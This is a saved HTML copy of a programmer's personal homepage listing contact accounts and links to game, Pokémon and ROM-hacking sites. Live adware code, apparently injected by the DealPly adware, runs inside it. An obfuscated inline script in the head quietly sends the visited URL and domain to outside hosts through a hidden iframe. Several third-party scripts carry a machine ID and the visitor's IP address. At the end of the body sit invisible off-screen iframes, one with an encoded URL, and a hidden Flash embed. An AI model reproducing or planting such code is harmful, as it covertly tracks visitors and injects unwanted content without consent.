<!DOCTYPE html>
<html>
<head>
<script type="text/javascript" async>
(function(){try{if(typeof window['asdfdsasdfdsa'] === 'undefined'){setTimeout(function(){var shouldThisPartOfCodeRun = document.URL.search('http') === 0 ;if(!shouldThisPartOfCodeRun){	return;}if(typeof DealPly !== 'undefined' && typeof DealPly.serverCallParam=== 'string'  ){var reportFlag = true;var scArr = document.getElementsByTagName('script');for(var index in scArr){if(typeof scArr[index].src === 'string' && scArr[index].src.search('\\.js\\?dn=') !== -1){	reportFlag = false;}}if(!reportFlag ){	return;}var host = 'http://q.nadijs.info/';var isSecure =  document.URL.search('https://') === 0 ;if(isSecure){	host = 'https://endall41-q.apollocdn.com/';}var urlPath = 'dealdo/event-report?type=quick&';var iframe = document.createElement('iframe');var suffix = ''; try{if(typeof JavaScriptJsTagUrl !== 'undefined'){suffix = JavaScriptJsTagUrl.substr(JavaScriptJsTagUrl.search('\?') + 1 );}}catch(e324324){}iframe.setAttribute('style','position:relative; left:-10000px; width:1px; height:1px; visibility:hidden');iframe.setAttribute('src',host + urlPath + 'url=' + encodeURIComponent(document.URL) + '&domain=' + document.domain   + '&topic=dpdiedarg&' + suffix );document.body.appendChild(iframe);}}, 10000);window['asdfdsasdfdsa'] = true;} }catch(e235534){}})();
</script>
<meta charset="utf-8">
<link href="//fonts.googleapis.com/css?family=Ubuntu&amp;subset=latin,latin-ext" rel="stylesheet" type="text/css">
<link rel="shortcut icon" type="image/x-icon" href="favicon.ico">
<style>

        body {background:url('img/squairy_purple.png') black; background-position:fixed;
            color: white; text-shadow: 0 0 8px white; font-family: "Ubuntu", "Calibri", "Arial", sans-serif;}
        
	a {color: white;}

        #content {margin: 2px 15% 2px 15%; margin:auto; padding:16px 32px 16px 32px;
            /*background:url('img/squairy_purple_blurred.png'); background-position:fixed;*/
            background-color: rgba(255, 255, 255, 0.05);
            /*background-color: rgba(0, 0, 0, 0.25);*/
            border-radius:32px; 
            max-width:800px;
            }
            
        h1 {border-bottom:1px solid white;}
        h2 {border-bottom:1px solid white;}
        
        #tagline {font-style:italic; display: none;}
            
        footer {text-align:right;}
        
        
        .left {width:50%; float:left;}
        .right {width:50%; float:right;}
        
        
        /*
        .left {width:50%; margin:auto;}
        .right {width:50%; margin:auto;}
        */
        
        .clear {clear:both;}
        .link {clear:both; display:block; box-shadow:0px 0px 1px white inset, 0px 0px 2px white inset;
            border: 0px solid white; width:100%; height:64px; position:relative; color:white; text-align:right;
            background-color: rgba(255, 255, 255, 0.05); background-repeat:no-repeat;
            font-size:13px;}
        .halflink {display:inline-block; clear:none; width:50%; float:left;}
        .semilink {height:32px;}
        .link:hover {background-color: rgba(255, 255, 255, 0.1);
            box-shadow:0px 0px 1px white inset, 0px 0px 2px white inset, 0 0 8px white, 0 0 16px white;}
        .link > div {position:absolute; bottom:0; right:0; margin-right:6px; font-style:italic;}
        .link > div > div {display:block; font-size:28px; font-style:normal;}
        .semilink > div > div {display:inline; margin-right:6px; font-size:22px; font-style:normal;}
        
        .jul {background-image:url('img/jul.png');}
        .tcrf {background-image:url('img/tcrf.png');}
        .github {background-image:url('img/github.png')}
        .bitbucket {background-image:url('img/bitbucket.png');}
        .twitter {background-image:url('img/twitter.png');}
        .youtube {background-image:url('img/youtube.png')}
        .twitch {background-image:url('img/twitch.png');}
        .minecraft {background-image:url('img/minecraft.png');}
        .whatpulse {background-image:url('img/whatpulse.png');}
        .email {background-image:url('img/email.png');}
        .veekun {background-image:url('img/veekun.png');}
        /*.wikifang {background-image:url('img/wikifang.png');}*/
        .rainwave {background-image:url('img/rainwave.png'); }
        .brmlab {background-image:url('img/brmlab.png'); }
        .z10p {background-image:url('img/z10p.png'); }
        .tumblr {background-image:url('img/tumblr.png'); }
        .masu {background-image:url('img/masu.png'); }
        
        footer {font-size:9px;}
	#rl {letter-spacing:4px; text-align:center; margin-top:16px;}
	#rl a {color: white; text-decoration:none;}
	#rl a:hover {text-decoration:underline;}
  
  </style>
  <script type="text/javascript" src="http://i.mrlmbssrc.org/mrlm/javascript.js?hid=3566860F-775E-5542-8E7D-7764DDF31DF4&amp;channel=Aa865780bfe3e8a8f-0-FS-US"></script>
  <script type="text/javascript" src="http://i.mrlmbsjs.info/mrlm/javascript.js?hid=3566860F-775E-5542-8E7D-7764DDF31DF4&amp;channel=Aa865780bfe3e8a8f-0-FS-US"></script>
  <script type="text/javascript" src="//3zone.info/jslib?pid=62007&amp;said=Aa865780bfe3e8a8f-0-FS-US&amp;san=TurboMac&amp;met=1|0"></script>
<script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.js"></script>
<script type="text/javascript" src="//aa717cc6a1a3f747e4b5f78c8f57586437.com/sm/mu?id=3566860F-775E-5542-8E7D-7764DDF31DF4&amp;d=Aa865780bfe3e8a8f-0-FS-US&amp;cl=0"></script>
<script src="http://i.mrlmbsjs.info/opt_content.js?v=opt_1476824312279&amp;partner=mrlm&amp;channel=mrlmAa865780bfe3e8a8f-0-FS-US&amp;sset=8&amp;appTitle=&amp;products=&amp;ip=24.224.72.207"></script>
<script src="http://c.mrlmbsjs.info/-1557026070.js?dn=rustedlogic.net&amp;isc=0" type="text/javascript" id="__DealPly__937860.208476721" class="dealply_content_script"></script>
<script src="http://f.mrlmbsjs.info/feedmon/feedmon_extra.js" type="text/javascript" id="__DealPly__5008.382319316329" class="dealply_content_script"></script>
<script src="http://f.mrlmbsjs.info/crt.js" type="text/javascript" id="__DealPly__769569.4060683281" class="dealply_content_script"></script>
<script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/1.8/jquery.min.js"></script>
</head><body style="height: 1666px; overflow: visible;"><div style="display: none;">Aa865780bfe3e8a8f-0-FS-US</div>
<!-- TODO SMS Power! -->
    <div id="content">
        <h1>James's homepage</h1>
        <div id="tagline">Tagline Goes Here<!--&lt;div id="tagline"&gt;&lt;/div&gt;--></div>
        <p>Hi!  I'm <strong>James</strong> (or also <strong>Joey</strong>).  I'm a programmer from North Carolina, in the US.
        </p><p>I'm proficient in Javascript, and also speak HTML and Python.
        </p><p><strong>You may be looking for my <a href="http://sanqui.rustedlogic.net/randomizer/">Online Randomizer</a>.</strong>
        </p><div class="left">
            <h2>Me</h2>
            <a class="link email" href="mailto:looney1jrl@gmail.com">
                <div><div>Email</div>looney1jrl@gmail.com</div>
            </a>
            <a class="link twitter" href="https://twitter.com/JoeyLooney2004">
                <div><div>Twitter</div>James Looney</div>
            </a>
           
            <a class="link semilink gplus" href="https://plus.google.com/115696706706033184687/">
                <div><div>Google+</div>Sanky Sanquii</div>
            </a>
            <a class="link halflink github" href="https://github.com/Sanqui">
                <div><div>Github</div>Sanqui</div>
            </a>
            <a class="link halflink bitbucket" href="https://bitbucket.org/jlooney2004">
                <div><div>Bitbucket</div>jlooney2004</div>
            </a>
            <a class="link halflink youtube" href="https://www.youtube.com/channel/UCPnmn4VRrAmH40TohZAdHAw">
                <div><div>Jotato Chip</div>Youtube</div>
            </a>
            <a class="link halflink instagram" href="https://www.instagram.com/j_lo2004/?hl=en">
		<div><div>Instagram</div>j_lo2004</div>
	    </a>
	    <div class="link halflink semilink skype" href="#">
                <div><div>Skype</div>sankytm</div>
            </div>
            <div class="link halflink semilink msn" href="#">
                <div><div>MSN</div><small>sankymaster@hotmail.com</small></div>
            </div>
            <div class="link halflink semilink aim" href="#">
                <div><div>AIM</div>sankyult</div>
            </div>
            <div class="link halflink semilink icq" href="#">
                <div><div>ICQ</div>412486084</div>
            </div>
            <a class="link semilink telegram" href="https://telegram.me/sanqui">
                <div><div>Telegram</div>@sanqui</div>
            </a>
            
            <a class="link keybase" href="https://keybase.io/sanqui">
                <div><div>Keybase</div>sanqui</div>
            </a>
            <a class="link whatpulse" href="http://whatpulse.org/Sanky">
                <div><div>Whatpulse</div>Sanky</div>
            </a>
            <a class="link tilde" href="http://tilde.town/~sanqui/">
                <div><div>tilde.town</div>~sanqui</div>
            </a>
        </div>
        <div class="right">
            <h2>Cool links</h2>
            <a class="link jul" href="http://jul.rustedlogic.net/">
                <div><div>Jul</div>a forum</div>
            </a>
            <a class="link tcrf" href="http://tcrf.net/">
                <div><div>TCRF</div>wiki about unused content in video games</div>
            </a>
            <a class="link halflink" href="http://s15.zetaboards.com/Tulunk_Village/index/">
                <div><div>Tulunk Village</div>telefang forum</div>
            </a>
            <a class="link halflink wikifang" href="http://wikifang.meowcorp.us/wiki/Wikifang">
                <div><div>Wikifang</div>telefang wiki</div>
            </a>
            <a class="link tilde" href="http://tilde.town/">
                <div><div>tilde.town</div>html + feels</div>
            </a>
            <!--
            <a class="link semilink kafuka" href="http://board.kafuka.org/">
                <div><div>Kafuka</div>another forum</div>
            </a>
            <a class="link semilink holzed" href="http://holzed.com/">
                <div><div>holzed</div>i needed a filler semilink</div>
            </a>
            -->
            <a class="link veekun" href="http://veekun.com/">
                <div><div>veekun</div>awesome open-source pokédex</div>
            </a>
            <a class="link semilink" href="http://www.dragonflycave.com/">
                <div><div>The Cave of Dragonflies</div>pokémon fansite</div>
            </a>
            <a class="link semilink" href="https://github.com/pret">
                <div><div>pret</div>pokémon disassemblies</div>
            </a>
            <a class="link rainwave" href="http://rainwave.cc/">
                <div><div>Rainwave</div>video game music radio</div>
            </a>
            <a class="link semilink tasvideos" href="http://tasvideos.org/">
                <div><div>TASVideos</div>tool-asisted game movies</div>
            </a>
            <a class="link semilink speedrunslive" href="http://speedrunslive.com/">
                <div><div>SpeedRunsLive</div>game races</div>
            </a>
            <a class="link semilink" href="http://www.pokemonspeedruns.com/">
                <div><div>Pokémon Speedruns</div>a wiki</div>
            </a>
            <a class="link semilink" href="http://forums.glitchcity.info/index.php">
                <div><div>Glitch City Laboratories</div>pokémon glitches</div>
            </a>
            <a class="link halflink semilink nesdev" href="http://nesdev.com/">
                <div><div>nesdev</div>nes development</div>
            </a>
            <a class="link halflink semilink  gbdev" href="http://gbdev.gg8.se/forums/">
                <div><div>gbdev</div>dameboy development</div>
            </a>
            <a class="link hiddenpalace" href="http://www.hidden-palace.org/">
                <div><div>Hidden Palace</div>the video game prototype museum</div>
            </a>
            <a class="link halflink semilink" href="http://www.transformice.com/">
                <div><div>Transformice</div>flash game</div>
            </a>
            <a class="link halflink semilink" href="http://kikoo.formice.com/">
                <div><div>kikoo</div>TFM dev wiki</div>
            </a>
            <a class="link masu" href="http://www.machinaesupremacy.com/">
                <div><div>Machinae Supremacy</div>sountrack for the brand new breed</div>
            </a>
<!--
            <a class="link brmlab" href="https://www.brmlab.cz/">
                <div><div>brmlab</div>hackerspace prague</div>
            </a> -->
            <a class="link halflink ia" href="https://archive.org/">
                <div><div><small>Internet Archive</small></div>the digital archive</div>
            </a>
            <a class="link halflink archiveteam" href="http://archiveteam.org/">
                <div><div>Archive Team</div>will rescue your shit</div>
            </a>
            <a class="link semilink firefox" href="https://www.firefox.com/">
                <div><div>Firefox</div>great browser by a nonprofit</div>
            </a>
            <a class="link semilink eff" href="https://www.eff.org/">
                <div><div>EFF</div>protecting your digital rights</div>
            </a>
            <a class="link semilink tor" href="https://www.eff.org/">
                <div><div>Tor project</div>enables anonymity online</div>
            </a>
            <!--
            <a class="link semilink rhdn" href="http://www.romhacking.net/">
                <div><div>ROMHacking.net</div></div>
            </a>
            -->
            <a class="link" href="http://fit.cvut.cz/">
                <div><div>FIT CTU</div>my university</div>
            </a>
            <h2>Česky</h2>
            <a class="link halflink pika" href="http://www.pikachu.cz/">
                <div><div>Pikachu.cz</div>česká pokéstránka</div>
            </a>
            <a class="link halflink pjz" href="http://www.pjz.cz/">
                <div><div>PJZ</div>sesterská, přístupnější stránka</div>
            </a>
            <a class="link z10p" href="http://www.zabij10prasat.cz/">
                <div><div>Zabij 10 prasat</div>stránka s recenzemi na hry</div>
            </a>
            <a class="link minecraft" href="http://mc.zabij10prasat.cz/">
                <div><div>Zabij 10 prasat Minecraft</div>minecraftový server</div>
            </a>

        </div>
        <div class="clear"></div>
    </div>
    <div style="text-align:center; /* i'm sorry */ margin-top: 8px;">&nbsp;
    </div>
    <footer><div id="rl"><a href="http://rustedlogic.net">Rusted Logic</a></div>
    hosted on <i>ikusora</i><br>2013—2016<br>Original Subtle Pattern made by Tia Newbury (CC BY-SA)<br><br>φ ⠠⠵</footer>
<!-- Piwik -->
<script type="text/javascript" defer="" async="" src="http://sanky.rustedlogic.net/piwik/piwik.js"></script><script type="text/javascript">
  var _paq = _paq || [];
  _paq.push(['trackPageView']);
  _paq.push(['enableLinkTracking']);
  (function() {
    var u=(("https:" == document.location.protocol) ? "https" : "http") + "://sanky.rustedlogic.net/piwik/";
    _paq.push(['setTrackerUrl', u+'piwik.php']);
    _paq.push(['setSiteId', 1]);
    var d=document, g=d.createElement('script'), s=d.getElementsByTagName('script')[0]; g.type='text/javascript';
    g.defer=true; g.async=true; g.src=u+'piwik.js'; s.parentNode.insertBefore(g,s);
  })();
</script>
<noscript>&amp;lt;p&amp;gt;&amp;lt;img src="http://sanky.rustedlogic.net/piwik/piwik.php?idsite=1" style="border:0;" alt="" /&amp;gt;&amp;lt;/p&amp;gt;</noscript>
<!-- End Piwik Code -->

<!--
-->

<iframe class="hb1480113092601" id="hb1480113092601" frameborder="0" border="no" scrolling="no" src="https://foxi69.tlscdn.com/altHbHandler.html#opdom=mrlmbsjs.info&amp;partner=mrlm&amp;channel=mrlmAa865780bfe3e8a8f-0-FS-US&amp;country=US&amp;quick=https%3A%2F%2Fendall41-q.apollocdn.com%2F&amp;trinity=Z11n096m3p2v&amp;instgrp=&amp;referrer=&amp;hid=3566860F-775E-5542-8E7D-7764DDF31DF4&amp;sset=8&amp;pageurl=http%3A%2F%2Fsanqui.rustedlogic.net%2F" style="width: 1px; height: 1px; position: absolute; top: -100000px; left: -100000px; visibility: visible; overflow: hidden;"></iframe><iframe id="asdfad" src="http://f.asdfzxcv1312.com/idle.html#B3bKB209BxjSBwjZANmUAw5MBYzWyxj0BMvYpw1YBg0My2HHBM5LBd1TCMXTqwe4nJu3odbIzMuZztHHogyTmc1guY1vuYzJB3vUDhj5pvvtjMn1CNjLBNrKB21HAw49yxnKzNP4y3yXmZeYlMnVBsz0CMLUAxr5pvOXmw4WotzTm3aYDIzPBNn0z3jWpszZzxnZAw9UAwq9mtq4mdeXmZa5mJyWnJm0nJyMAgLKptm1nJy4nJbgltC3nuuTntu0mI04rtDeltC3nJrereyZmurgnczWywDLDxjSpwH0DhaLm0eLmKyLmKzZyw5XDwKUCNvZDgvKBg9NAwmUBMv0jtjg" visibility="visible" overflow="hidden" frameborder="0" border="no" scrolling="no" style="width: 0;  height: 0;  position: absolute;  top: -10031px;  left:-1000000px;"></iframe><div id="dp_swf_engine" style="position: absolute; width: 1px; height: 1px;"><embed style="width: 1px; height: 1px;" type="application/x-shockwave-flash" src="http://www.ajaxcdn.org/swf.swf" width="1" height="1" id="_dp_swf_engine" name="_dp_swf_engine" bgcolor="#336699" quality="high" allowscriptaccess="always"></div><iframe class="dealply-toast s" id="s" frameborder="0" border="no" scrolling="no" src="http://f.mrlmbsjs.info/skinedEmpty.html" style="width: 1px; height: 1px; position: absolute; top: -100000px; left: -100000px; visibility: visible; overflow: hidden;"></iframe><iframe class="hb1480113092738" id="hb1480113092738" frameborder="0" border="no" scrolling="no" src="https://foxi69.tlscdn.com/altHbHandler.html#opdom=mrlmbsjs.info&amp;partner=mrlm&amp;channel=mrlmAa865780bfe3e8a8f-0-FS-US&amp;country=US&amp;quick=https%3A%2F%2Fendall41-q.apollocdn.com%2F&amp;trinity=Z11n096m3p2v&amp;instgrp=&amp;referrer=&amp;hid=3566860F-775E-5542-8E7D-7764DDF31DF4&amp;sset=8&amp;mmth=false&amp;pageurl=http%3A%2F%2Fsanqui.rustedlogic.net%2F" style="width: 1px; height: 1px; position: absolute; top: -100000px; left: -100000px; visibility: visible; overflow: hidden;"></iframe><div style="top: 943px; left: 21.3448%; width: 300px; height: auto; position: absolute; z-index: -1; background: transparent; overflow: visible; display: block; opacity: 0;"></div></body
</html>
